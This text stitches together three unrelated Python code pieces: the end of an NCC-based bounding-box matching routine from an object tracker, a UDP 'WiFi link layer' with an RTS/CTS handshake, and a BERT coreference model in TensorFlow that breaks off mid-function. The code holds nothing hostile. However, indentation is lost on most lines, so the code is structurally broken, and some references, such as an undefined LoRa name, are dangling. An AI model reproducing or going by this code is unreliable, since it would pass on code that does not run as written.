# int(search.shape[2]*searchBBoxGTScaled[i,0]):int(search.shape[2]*searchBBoxGTScaled[i,2]), :]
# if searchPM.size == 0:
# return
# #searchPM = cv2.resize(searchPM, (targetPM.shape[2], targetPM.shape[1]))
# ## Calculate search NCC parameters for the photometric match
# meanSearch = np.mean(searchPM)
# stdSearch = np.sqrt(np.var(searchPM))
# ## Run over the mid patch to find the bounding box which yield the maximum NCC similarity
# # Initial guess - the mid BB prediction
# yMin = int(mid.shape[1]*searchBBoxGTScaled[i,1])
# yMax = int(mid.shape[1]*searchBBoxGTScaled[i,3])
# xMin = int(mid.shape[2]*searchBBoxGTScaled[i,0])
# xMax = int(mid.shape[2]*searchBBoxGTScaled[i,2])
# firstCheck = True
# foundGoodMatch = False
# for xShift in range(-32, 32, 4):
# for yShift in range(-32, 32, 4):
# for xVar in range(-2, 2, 2):
# for yVar in range(-2, 2, 2):
# if foundGoodMatch:
# return
# # Extract mid object prediction for the PM loss
# midPM = mid[i, yMin+yShift+yVar:yMax+yShift-yVar, xMin+xShift+xVar:xMax+xShift-xVar, :]
# if midPM.size == 0:
# return
# midTargetPM = cv2.resize(midPM, (targetPM.shape[2], targetPM.shape[1]))
# midSearchPM = cv2.resize(midPM, (searchPM.shape[1], searchPM.shape[0]))
# ## Calculate mid NCC parameters for the photometric match
# meanMidTargetPM = np.mean(midTargetPM)
# stdMidTargetPM = np.sqrt(np.var(midTargetPM))
# meanMidSearchPM = np.mean(midSearchPM)
# stdMidSearchPM = np.sqrt(np.var(midSearchPM))
# try:
# nccTargetMid = np.mean(((targetPM[i]-meanTarget[i])/stdTarget[i])*((midTargetPM-meanMidTargetPM)/stdMidTargetPM))
# nccMidSearch = np.mean(((searchPM-meanSearch)/stdSearch)*((midSearchPM-meanMidSearchPM)/stdMidSearchPM))
# except:
# print "Couldn't calculate NCC..."
# return
# if firstCheck:
# nccMax[i] = nccTargetMid + nccMidSearch
# pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
# ((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
# else:
# if nccMax[i] < nccTargetMid + nccMidSearch:
# nccMax[i] = nccTargetMid + nccMidSearch
# pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
# ((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
# if nccMax[i] > 1.6 or nccTargetMid > 0.9 or nccMidSearch > 0.9:
# foundGoodMatch = True
#-------------------------------------------------------------------------------
        ## Scaling all bounding boxes for the PM loss: the target BBox is exactly the patch size
        ## --> make it 80% of the patch size, i.e. shrink the GT bounding box to 80% of its size
searchBBoxGT = inData[3]
widthShift = 0.2*((searchBBoxGT[:,2]-searchBBoxGT[:,0])/2.)
heightShift = 0.2*((searchBBoxGT[:,3]-searchBBoxGT[:,1])/2.)
widthShift = np.reshape(widthShift, (-1,1))
heightShift = np.reshape(heightShift, (-1,1))
searchBBoxGTScaled = searchBBoxGT + np.concatenate((widthShift, heightShift, -widthShift, -heightShift), axis=1)
#target = inData[0]
mid = inData[1]
search = inData[2]
## Extract target object for the PM match
#targetPM = target
#targetPM = targetPM[:, targetPM.shape[1]*1/10:targetPM.shape[1]*9/10, targetPM.shape[2]*1/10:targetPM.shape[2]*9/10, :]
## Calculate target NCC parameters for the photometric match
#meanTarget = np.mean(targetPM, axis=(1,2,3))
#stdTarget = np.sqrt(np.var(targetPM, axis=(1,2,3)))
## Run over the batch and match the most similar mid bounding box to the target and search
nccMax = -2*np.ones((self.batch_size), dtype=np.float32)
pmMidBB = np.zeros((self.batch_size, 4), dtype=np.float32)
countBadSearchBB = 0
countBadMidBB = 0
#for idxOffset in range(0, self.batch_size, self.batch_size/5):
# threads = [None] * (self.batch_size/5)
# for i in range(len(threads)):
# threads[i] = Thread(target=findBestMatch, args=(i+idxOffset, searchBBoxGTScaled, mid, search, targetPM, meanTarget, stdTarget, nccMax, pmMidBB))
# threads[i].start()
# for i in range(len(threads)):
# threads[i].join()
for i in range(self.batch_size):
#print "Run on sample number: {}".format(i)
## Extract search object based on GT bounding box, for the PM match
searchPM = search[i, int(search.shape[1]*searchBBoxGTScaled[i,1]):int(search.shape[1]*searchBBoxGTScaled[i,3]),
int(search.shape[2]*searchBBoxGTScaled[i,0]):int(search.shape[2]*searchBBoxGTScaled[i,2]), :]
if searchPM.size == 0:
countBadSearchBB += 1
continue
#searchPM = cv2.resize(searchPM, (targetPM.shape[2], targetPM.shape[1]))
## Calculate search NCC parameters for the photometric match
meanSearch = np.mean(searchPM)
stdSearch = np.sqrt(np.var(searchPM))
## Run over the mid patch to find the bounding box which yield the maximum NCC similarity
# Initial guess - the mid BB prediction
yMin = int(mid.shape[1]*searchBBoxGTScaled[i,1])
yMax = int(mid.shape[1]*searchBBoxGTScaled[i,3])
xMin = int(mid.shape[2]*searchBBoxGTScaled[i,0])
xMax = int(mid.shape[2]*searchBBoxGTScaled[i,2])
firstCheck = True
foundGoodMatch = False
for xShift in range(-30, 30, 5):
for yShift in range(-30, 30, 5):
for xVar in range(-2, 2, 2):
for yVar in range(-2, 2, 2):
if foundGoodMatch:
continue
# Extract mid object prediction for the PM loss
midPM = mid[i, yMin+yShift+yVar:yMax+yShift-yVar, xMin+xShift+xVar:xMax+xShift-xVar, :]
if midPM.size == 0:
countBadMidBB += 1
continue
#midTargetPM = cv2.resize(midPM, (targetPM.shape[2], targetPM.shape[1]))
midSearchPM = cv2.resize(midPM, (searchPM.shape[1], searchPM.shape[0]))
## Calculate mid NCC parameters for the photometric match
#meanMidTargetPM = np.mean(midTargetPM)
#stdMidTargetPM = np.sqrt(np.var(midTargetPM))
meanMidSearchPM = np.mean(midSearchPM)
stdMidSearchPM = np.sqrt(np.var(midSearchPM))
try:
#nccTargetMid = np.mean(((targetPM[i]-meanTarget[i])/stdTarget[i])*((midTargetPM-meanMidTargetPM)/stdMidTargetPM))
nccMidSearch = np.mean(((searchPM-meanSearch)/stdSearch)*((midSearchPM-meanMidSearchPM)/stdMidSearchPM))
except:
print "Couldn't calculate NCC..."
continue
if firstCheck:
#nccMax[i] = nccTargetMid + nccMidSearch
nccMax[i] = nccMidSearch
pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
else:
#if nccMax[i] < nccTargetMid + nccMidSearch:
if nccMax[i] < nccMidSearch:
#nccMax[i] = nccTargetMid + nccMidSearch
nccMax[i] = nccMidSearch
pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
#if nccMax[i] > 1.6 or nccTargetMid > 0.9 or nccMidSearch > 0.9:
if nccMidSearch > 0.8:
foundGoodMatch = True
## return the final results
return nccMax, pmMidBB, countBadSearchBB, countBadMidBB
|
wifi_link_layer.py
|
#from gossip_layer import Gossip
import socket
import time
import os
import threading
import binascii
import select
class Wifi_Link_Layer:
def __init__(self, receive_msg_cb):
print("Initializing Link Layer...")
self.receive_msg_cb = receive_msg_cb
self.msg_buffer_list = []
self.incoming_cts_key = -1
self.wait = False #Use other name, e.g. wait_for_channel
self.wait_time = 0
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
#self.s.bind(("10.0.0.34", 5200))
self.s.bind(("192.168.0.27", 5200))
self.inputs = [self.s]
a = threading.Thread(target=self.thread_listen)
a.start()
b = threading.Thread(target=self.process_msg_pipeline)
b.start()
#_thread.start_new_thread(self.process_msg_pipeline, ())
#_thread.start_new_thread(self.thread_listen, ())
def thread_listen(self):
while True:
readable, writable, exceptional = select.select(self.inputs, [], [])
for sock in readable:
if sock == self.s:
buf = self.s.recv(250)
self.receive_msg_cb(buf)
print(buf)
    def lora_cb(self, lora):
        # Leftover callback from the LoRa variant of this link layer; it is unused in
        # the WiFi version and kept for reference (it would require pycom's `network.LoRa`).
        events = lora.events()
        if events & LoRa.RX_PACKET_EVENT:
            msg = self.s.recv(250)
            print('Link Layer: Passing received data to Network Layer')
            self.receive_msg_cb(msg)
def append_msg_to_pipeline(self, msg, use_ca):
self.msg_buffer_list.append([msg, use_ca])
    #Define a buffer length and discard messages or split them into partial packets.
    #Time on air -> wait a (random) multiple of it if the channel is not free.
def process_msg_pipeline(self):
while True:
if (len(self.msg_buffer_list) > 0):
msg_and_ca = self.msg_buffer_list.pop(0)
msg = msg_and_ca[0]
use_ca = msg_and_ca[1]
self.lora_send_csma_ca(msg, use_ca)
time.sleep(1)
def lora_send_csma_ca(self, msg, use_ca):
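        # RTS/CTS handshake: broadcast "rts.<random key>" and retransmit until the
        # peer echoes "cts.<same key>" (recorded by handle_incoming_cts); self.wait
        # suppresses RTS attempts while another node holds the channel.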
if (use_ca):
print("Link Layer: using CA")
#do not send rts if wait = true
rts_random_key_b = binascii.hexlify(os.urandom(2))
rts_random_key = str(rts_random_key_b, "utf-8")
rts = "rts." + rts_random_key
while not (rts_random_key == self.incoming_cts_key): #and not wait. Probably?
#maximum repetition
if not self.wait:
self.lora_send_csma(rts)
print("Link Layer: Waiting for cts. expected: " + str(rts_random_key) + " received: " + str(self.incoming_cts_key))
else:
print("Link Layer: Waiting..." + str(self.wait_time))
#change delay randomly/exponential
                #How long to wait? The CTS should not be overlapped by the next RTS attempt.
time.sleep(2)
else:
print("Link Layer: NOT using CA")
#blocking function
self.lora_send_csma(msg)
def lora_send_csma(self, msg):
#Semtech LoRa: High sensitivity -111 to -148dBm (Datasheet: https://semtech.my.salesforce.com/sfc/p/#E0000000JelG/a/2R0000001OKs/Bs97dmPXeatnbdoJNVMIDaKDlQz8q1N_gxDcgqi7g2o)
#while not self.lora.ischannel_free(-100,100):
#max rep.
#print("Link Layer: channel not free")
print("Link Layer: channel free (CSMA). Sending data...")
self.wifi_send(msg)
def wifi_send(self, msg):
#frame = self.pack_frame("c", msg)
frame = msg
print("Link Layer | Sending data: " + str(frame))
self.s.sendto (frame , ( "192.168.0.36" , 5200 ))
    def handle_incoming_cts(self, incoming_cts):
        # Decode defensively: the callback may receive raw bytes from the socket.
        if isinstance(incoming_cts, bytes):
            incoming_cts = incoming_cts.decode("utf-8")
        print("Link Layer: CTS received. Key=" + incoming_cts)
        self.incoming_cts_key = incoming_cts.split(".")[1]
        #Important: Wait also if CTS is for another lora. Use MAC address as identifier
#Combine with incoming RTS
    def handle_incoming_rts(self, incoming_rts):
        # Decode defensively: the callback may receive raw bytes from the socket.
        if isinstance(incoming_rts, bytes):
            incoming_rts = incoming_rts.decode("utf-8")
        incoming_rts_key = incoming_rts.split(".")[1]
        print("Link Layer: RTS received. Key=" + incoming_rts_key)
#send cts. what if cts gets lost? Ignore? CSMA sending messages
#only one rts at a time. identify rts if it is repeated.
#check if rts is new. Problem: other lora did not receive cts. Important: Waiting time
if (not self.wait):
            threading.Thread(target=self.wait_timer, args=(5,), daemon=True).start()
print("Link Layer: CTS other lora. Waiting for other lora...")
#save mac address of other lora and wait until packet from this lora arrived or max
cts = "cts." + incoming_rts_key
#self.lora_send_csma(cts.encode("utf-8"))
self.lora_send_csma(cts)
def wait_timer(self, wait_time):
self.wait_time = wait_time
self.wait = True
print("Wait timer")
while self.wait_time > 0:
time.sleep(1)
self.wait_time = self.wait_time - 1
print(str(self.wait_time))
self.wait = False
    #This field states whether the frame is a data frame or is used for control functions like error/flow control or link management.
def pack_frame(self, type, data):
#Use single bits for control and 8 bytes for MAC without delimiters. character delimiters can cause problems and need much space.
frame = type + "::" + self.get_lora_mac() + "::" + data
print("Link Layer:" + frame)
return frame
def unpack_frame(self, frame):
meta = [frame.split("::")[0], frame.split("::")[1]]
data = frame.split("::")[2]
return meta, data
|
gold_mentions.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import os
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
class CorefModel(object):
def __init__(self, config):
self.config = config
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.subtoken_maps = {}
self.gold = {}
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['init_checkpoint'])
tf.train.init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
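    # Feed tensorized training examples into the padding FIFO queue from a daemon
    # thread, so session.run() on the dequeue op always has input available.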
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
tensorized = self.tensorize_example(example, is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids = [], [], []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
# speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
# speaker_ids = np.array([speaker_dict[s] for s in speakers])
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
self.gold[doc_key] = example["clusters"]
genre = self.genres.get(doc_key[:2], 0)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
if self.config['single_example']:
return self.truncate_example(*example_tensors)
else:
offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
return tensor_list
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
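    # A candidate span inherits a gold cluster id iff both its start and end match a
    # labeled span; the matmul with the boolean same_span matrix scatters each label
    # onto its matching candidate (unmatched candidates get 0).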
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
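    # Returns a keep probability for tf.nn.dropout: 1.0 at eval time and
    # 1 - dropout_rate during training.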
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
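    # Coarse pruning: score every (span, antecedent) pair with cheap additive mention
    # scores plus a bilinear term (and optionally a distance prior), mask out
    # non-preceding spans via log(0) = -inf, and keep only the top c antecedents per
    # span for the expensive fine scoring.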
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
      antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, k]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
all_encoder_layers = model.get_all_encoder_layers()
mention_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(mention_doc)[0]
max_sentence_length = tf.shape(mention_doc)[1]
mention_doc = self.flatten_emb_by_sentence(mention_doc, input_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
flattened_sentence_indices = sentence_map
candidate_starts, candidate_ends = tf.clip_by_value(tf.concat([gold_starts, [0]], -1), 0, num_words-1), tf.clip_by_value(tf.concat([gold_ends, [0]], -1), 0, num_words-1)
#candidate_ends = tf.Print(candidate_ends, [candidate_ends])
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, input_mask)
      top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]
else:
top_span_speaker_ids = None
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(input_ids, 0), util.shape(input_ids, 1)
word_segments = tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len])
flat_word_segments = tf.boolean_mask(tf.reshape(word_segments, [-1]), tf.reshape(input_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
      head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, emb]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
